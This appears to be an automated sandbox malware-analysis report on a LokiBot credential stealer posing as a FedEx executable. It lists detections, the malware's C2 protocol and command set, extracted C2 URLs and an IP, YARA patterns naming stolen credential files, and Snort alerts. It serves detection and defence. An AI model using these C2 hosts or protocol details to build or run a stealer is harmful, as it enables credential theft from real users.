Edit tour

Windows Analysis Report
FedEx_776282383902.exe

Overview

General Information

Sample name:	FedEx_776282383902.exe
Analysis ID:	1446057
MD5:	d8754ead54bc3ccd3bb50e726362aef9
SHA1:	d5c8560b76bfbf841db72e06b311f1c0346b20a5
SHA256:	25c3b63be2ea8b26be5050a732146c6f611dc335a96f80860dec608ece37bc4e
Tags:	exeFedExLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FedEx_776282383902.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\FedEx_776282383902.exe" MD5: D8754EAD54BC3CCD3BB50E726362AEF9)

FedEx_776282383902.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\FedEx_776282383902.exe" MD5: D8754EAD54BC3CCD3BB50E726362AEF9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/t?id=090"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x79f00:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x672cb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x75b0f:$des3: 68 03 66 00 00 0x79f00:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x79fcc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17f20:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x52eb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13b2f:$des3: 68 03 66 00 00 0x17f20:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17fec:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1cef4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xa2a7:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x18aeb:$des3: 68 03 66 00 00 0x1cef4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1cfc0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: FedEx_776282383902.exe PID: 6752	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: FedEx_776282383902.exe PID: 6752	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: FedEx_776282383902.exe PID: 6752	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: FedEx_776282383902.exe PID: 6752	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5112d:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x54fe8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: FedEx_776282383902.exe PID: 6192	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: FedEx_776282383902.exe PID: 6192	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: FedEx_776282383902.exe PID: 6192	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: FedEx_776282383902.exe PID: 6192	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1db6:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.FedEx_776282383902.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
3.2.FedEx_776282383902.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.FedEx_776282383902.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.FedEx_776282383902.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.FedEx_776282383902.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.FedEx_776282383902.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.FedEx_776282383902.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.2.FedEx_776282383902.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.FedEx_776282383902.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.FedEx_776282383902.exe.42bab30.8.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.FedEx_776282383902.exe.42bab30.8.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FedEx_776282383902.exe.42bab30.8.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FedEx_776282383902.exe.42bab30.8.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.FedEx_776282383902.exe.42bab30.8.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.FedEx_776282383902.exe.42a0b10.7.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.FedEx_776282383902.exe.42a0b10.7.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FedEx_776282383902.exe.42a0b10.7.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FedEx_776282383902.exe.42a0b10.7.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.FedEx_776282383902.exe.42a0b10.7.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 37 entries

Snort Signatures

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:50.434635
SID:	2025381
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:00.654651
SID:	2024313
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:00.654651
SID:	2024318
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:20.207962
SID:	2021641
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:47.110312
SID:	2024318
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:10.745956
SID:	2024318
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:14.011875
SID:	2025381
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:10.745956
SID:	2024313
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:15.260799
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:39.745782
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:32.900181
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:03.530501
SID:	2025381
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:42.997268
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:32.900181
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:00.355563
SID:	2025381
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:33.749822
SID:	2025381
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:11.339177
SID:	2021641
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:00.355563
SID:	2024313
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:39.745782
SID:	2024313
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:06.757643
SID:	2025381
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:39.745782
SID:	2024318
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

